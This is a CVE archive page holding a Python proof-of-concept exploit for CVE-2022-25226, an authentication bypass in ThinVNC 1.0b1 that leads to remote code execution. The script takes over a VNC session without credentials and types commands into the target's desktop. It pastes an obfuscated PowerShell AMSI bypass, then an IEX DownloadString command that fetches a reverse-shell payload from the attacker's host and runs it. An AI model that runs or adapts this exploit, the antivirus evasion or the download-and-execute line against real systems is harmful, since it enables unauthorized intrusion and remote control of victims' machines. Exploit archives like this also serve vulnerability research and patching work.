4837 Total CVEs
26 Years
GitHub
Home / 2022 / CVE-2022-25226
README.md
Rendering markdown...
POC / cve-2022-25226.py PY
⬇ Raw GitHub ✕ Close 
import requests
import time
import argparse
import sys
import base64

'''
    Title: ThinVNC 1.0b1 - Authentication Bypass to RCE
    Author: krill-x7
'''

'''
You need to create and host a file called rev.ps1 on your attack machine which contains the powershell reverse shell payload that would be executed on the target. 
'''

parser = argparse.ArgumentParser(description="ThinVNC 1.0b1 - Authentication Bypass to RCE Exploit")
parser.add_argument('-t', dest='target', help='Target ip address', required=True)
parser.add_argument('-tp', dest='port', help='Target port')
parser.add_argument('-a', dest='atk_ip', help='Attacker ip address')
parser.add_argument('-ap', dest ='atk_port', help='Attacker port')

args = parser.parse_args()

target = f'http://{args.target}:{args.port}'

headers = {
     "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0",
    "Accept": "*/*",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "X-Requested-With": "XMLHttpRequest",
    "Connection": "close",
}


#endpoint_get_sid = '/cmd?cmd=connect&destAddr=poc&id=0'
#endpoint_start_sid = f'/cmd?cmd=start&mouseControl=true&kbdControl=true&quality=85&pixelFormat=0&monitor=0&id={sid}'
#endpoint_send_ctlEsc = f'/cmd?cmd=fkey&key=CtrlEsc&id={sid}'
#endpoint_send_cmd = f'/cmd?id={sid}&cmd=cli&type=clipboard&action=paste'
#endpoint_send_enter = f'/cmd?cmd=keyb&key=13&char=0&action=down&id={sid}'

cookies = {'SID':''}

def get_sid():
    url = target+'/cmd?cmd=connect&destAddr=poc&id=0'
    response = requests.get(url, headers=headers, cookies=cookies)
    #print(response.text)
    sid = response.json()['id']
    cookies['SID'] = sid
    return sid

def start_sid(sid):
    url = target+f'/cmd?cmd=start&mouseControl=true&kbdControl=true&quality=85&pixelFormat=0&monitor=0&id={sid}'
    response = requests.get(url, headers=headers, cookies=cookies)
    #print(response.text)
    if response.status_code != 200:
        print(f"[!] The server returned {response.status_code}")
        sys.exit()
    else:
        print(f"[+] SID {sid} started successfully.")
        time.sleep(2)
    
def send_ctrlEsc(sid):
    url = target+f'/cmd?cmd=fkey&key=CtrlEsc&id={sid}'
    response = requests.post(url, headers=headers, cookies=cookies)
    #print(response.text)
    if response.status_code != 200:
        print(f"[!] The server returned {response.status_code}")
        sys.exit()
    else:
        print(f"\n[+] Sending Ctrl + Esc to {sid}")
        time.sleep(1)
        print("     -> sent")
        time.sleep(1)

def send_cmd(sid, cmd):
    url = target+f'/cmd?id={sid}&cmd=cli&type=clipboard&action=paste'
    response = requests.post(url, headers=headers, cookies=cookies, data=cmd)
    #print(response.text)

    if response.status_code != 200:
        print(f"[!] The server returned {response.status_code}")
        sys.exit()
    else:
        print(f"\n[+] Sending command: `{cmd}` to SID:{sid}")
        time.sleep(1)
        send_enter(sid)
    
def send_enter(sid):
    url = target+f'/cmd?cmd=keyb&key=13&char=0&action=down&id={sid}'
    response = requests.get(url, headers=headers, cookies=cookies)
    #print(response.text)
    if response.status_code != 200:
        print(f"[!] The server returned {response.status_code}")
        sys.exit()
    else:
      print("     -> sent")
      time.sleep(2)

def main():
    print("Welcome to the land of the living")
    sid = get_sid()
    start_sid(sid)
    send_ctrlEsc(sid)
    print("\ntime to chain")
    send_cmd(sid,'run')
    amsi_txt = """powershell.exe -exec bypass"""
    send_cmd(sid, amsi_txt)
    amsi_txt = """S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )"""
    send_cmd(sid,amsi_txt)
    print("\n[+] Executing reverse shell payload ")
    shell = f"IEX((New-Object System.Net.WebClient).DownloadString('http://{args.atk_ip}:{args.atk_port}/rev.ps1'))"
    send_cmd(sid, shell)

            

if __name__ == "__main__":
    main()
    


# nothing happens here :)